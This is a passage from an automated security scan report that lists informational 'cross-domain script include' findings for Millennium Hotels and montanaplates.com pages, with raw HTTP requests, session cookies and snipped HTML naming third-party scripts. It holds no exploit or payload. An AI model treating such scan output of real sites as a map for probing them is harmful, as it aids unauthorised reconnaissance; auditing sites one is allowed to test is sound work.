<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilap"></script>
...[SNIP]...

   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.738. http://www.millenniumhotels.com/opening/millenniumveetaichung.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/opening/millenniumveetaichung.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus

Request

GET /opening/millenniumveetaichung.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:10:57 GMT
ETag: "34d1b-f87b-37ce3d11"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:02:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 63611

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xh
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus"></script>
...[SNIP]...

18.739. http://www.millenniumhotels.com/ph/heritagemanila/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/ph/heritagemanila/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilap
http://track.roiservice.com/track/track.aspx?ROIID=936138107000019
http://www.google-analytics.com/urchin.js

Request

GET /ph/heritagemanila/index.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 10:10:57 GMT
ETag: "2ac59-e90b-dd7b9f78"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:02:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 59659

                                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilap"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://track.roiservice.com/track/track.aspx?ROIID=936138107000019"></script>
...[SNIP]...

   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.740. http://www.millenniumhotels.com/premierhotelnewyork/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/premierhotelnewyork/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus
http://track.roiservice.com/track/track.aspx?ROIID=936138107000019

Request

GET /premierhotelnewyork/index.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:10:34 GMT
ETag: "35249-f93b-893ef1fb"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:03:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 63803

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://track.roiservice.com/track/track.aspx?ROIID=936138107000019"></script>
...[SNIP]...

18.741. http://www.millenniumhotels.com/qa/millenniumdoha/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/qa/millenniumdoha/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilme

Request

GET /qa/millenniumdoha/index.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:42:56 GMT
ETag: "22741-c836-fd09c093"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:02:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilme"></script>
...[SNIP]...

18.742. http://www.millenniumhotels.com/th/grandmillenniumsukhumvitbangkok/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/th/grandmillenniumsukhumvitbangkok/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilap
http://www.google-analytics.com/urchin.js

Request

GET /th/grandmillenniumsukhumvitbangkok/index.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:10:06 GMT
ETag: "20cdd-e63d-34c4475a"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:02:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58941

                                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilap"></script>
...[SNIP]...

   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.743. http://www.millenniumhotels.com/th/millenniumpatongphuket/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/th/millenniumpatongphuket/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilap
http://www.google-analytics.com/urchin.js

Request

GET /th/millenniumpatongphuket/index.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 10:09:59 GMT
ETag: "212f4-e428-da028f5f"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:02:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58408

                                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilap"></script>
...[SNIP]...

   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.744. http://www.millenniumhotels.com.cn/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com.cn
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://v1.jiathis.com/code/jia.js?uid=96395
https://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js

Request

GET / HTTP/1.1
Host: www.millenniumhotels.com.cn
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 16:03:31 GMT
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:09:20 GMT
ETag: "14c79-e533-84d3a62a"
Accept-Ranges: bytes
Content-Length: 58675
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="zh-Hans" lan
...[SNIP]...
</script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://v1.jiathis.com/code/jia.js?uid=96395" charset="utf-8"></script>
...[SNIP]...

18.745. http://www.millenniumhotels.com.sg/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com.sg
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilap
http://www.google-analytics.com/urchin.js

Request

GET / HTTP/1.1
Host: www.millenniumhotels.com.sg
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 10:16:48 GMT
ETag: "1b773-242b6-f25edff4"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:03:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 148150

                                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilap"></script>
...[SNIP]...

   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.746. http://www.millenniumhotels.com.sg/StudioMHotel/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com.sg
Path:	/StudioMHotel/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilap
http://www.google-analytics.com/urchin.js

Request

GET /StudioMHotel/index.html HTTP/1.1
Host: www.millenniumhotels.com.sg
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:17:18 GMT
ETag: "2102a-e497-4e848d6c"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:03:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58519

                                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilap"></script>
...[SNIP]...

   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.747. http://www.millenniumhotels.com.sg/copthornekingssingapore/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com.sg
Path:	/copthornekingssingapore/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilap
http://www.google-analytics.com/urchin.js

Request

GET /copthornekingssingapore/index.html HTTP/1.1
Host: www.millenniumhotels.com.sg
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:17:34 GMT
ETag: "132f8-e78d-a246ebe0"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:03:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 59277

                                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilap"></script>
...[SNIP]...

   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.748. http://www.millenniumhotels.com.sg/copthorneorchidsingapore/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com.sg
Path:	/copthorneorchidsingapore/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilap
http://www.google-analytics.com/urchin.js

Request

GET /copthorneorchidsingapore/index.html HTTP/1.1
Host: www.millenniumhotels.com.sg
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:17:26 GMT
ETag: "15ba4-e507-a1cd90fb"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:03:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58631

                                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilap"></script>
...[SNIP]...

   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.749. http://www.millenniumhotels.com.sg/grandcopthornewaterfront/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com.sg
Path:	/grandcopthornewaterfront/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilap
http://www.google-analytics.com/urchin.js

Request

GET /grandcopthornewaterfront/index.html HTTP/1.1
Host: www.millenniumhotels.com.sg
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:17:17 GMT
ETag: "184d6-e733-a149f593"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:03:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 59187

                                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilap"></script>
...[SNIP]...

   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.750. http://www.millenniumhotels.com.sg/mhotelsingapore/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com.sg
Path:	/mhotelsingapore/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilap
http://www.google-analytics.com/urchin.js

Request

GET /mhotelsingapore/index.html HTTP/1.1
Host: www.millenniumhotels.com.sg
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:17:06 GMT
ETag: "1bdc9-e7e3-a0a44224"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:03:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 59363

                                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilap"></script>
...[SNIP]...

   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.751. http://www.millenniumhotels.com.sg/orchardhotelsingapore/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com.sg
Path:	/orchardhotelsingapore/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilap
http://track.roiservice.com/track/track.aspx?ROIID=936138107000019
http://www.google-analytics.com/urchin.js

Request

GET /orchardhotelsingapore/index.html HTTP/1.1
Host: www.millenniumhotels.com.sg
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:15:53 GMT
ETag: "1fe8d-f44f-496dd554"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:03:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 62543

                                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilap"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://track.roiservice.com/track/track.aspx?ROIID=936138107000019"></script>
...[SNIP]...

   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.752. http://www.montanaplates.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.montanaplates.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://kona.kontera.com/javascript/lib/KonaLibInline.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en
http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm

Request

GET / HTTP/1.1
Host: www.montanaplates.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:28:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31673

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Cont
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script><script type="text/javascript" src="http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>

</script>
...[SNIP]...

18.753. http://www.montanaplates.com/747natoma.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.montanaplates.com
Path:	/747natoma.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://kona.kontera.com/javascript/lib/KonaLibInline.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en
http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm

Request

GET /747natoma.html HTTP/1.1
Host: www.montanaplates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:33:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27648

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Cont
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script><script type="text/javascript" src="http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>

</script>
...[SNIP]...

18.754. http://www.montanaplates.com/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.montanaplates.com
Path:	/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://kona.kontera.com/javascript/lib/KonaLibInline.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en
http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm

Request

GET /880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html HTTP/1.1
Host: www.montanaplates.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:28:09 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22985

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Cont
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script><script type="text/javascript" src="http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>

</script>
...[SNIP]...

18.755. http://www.montanaplates.com/index-2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.montanaplates.com
Path:	/index-2.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://kona.kontera.com/javascript/lib/KonaLibInline.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en
http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm

Request

GET /index-2.html HTTP/1.1
Host: www.montanaplates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:33:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38877

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Cont
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script><script type="text/javascript" src="http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>

</script>
...[SNIP]...

18.756. http://www.montanaplates.com/onlineshoppingempire.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.montanaplates.com
Path:	/onlineshoppingempire.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://kona.kontera.com/javascript/lib/KonaLibInline.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en
http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm

Request

GET /onlineshoppingempire.html HTTP/1.1
Host: www.montanaplates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:33:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22227

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Cont
...[SNIP]...
</script>
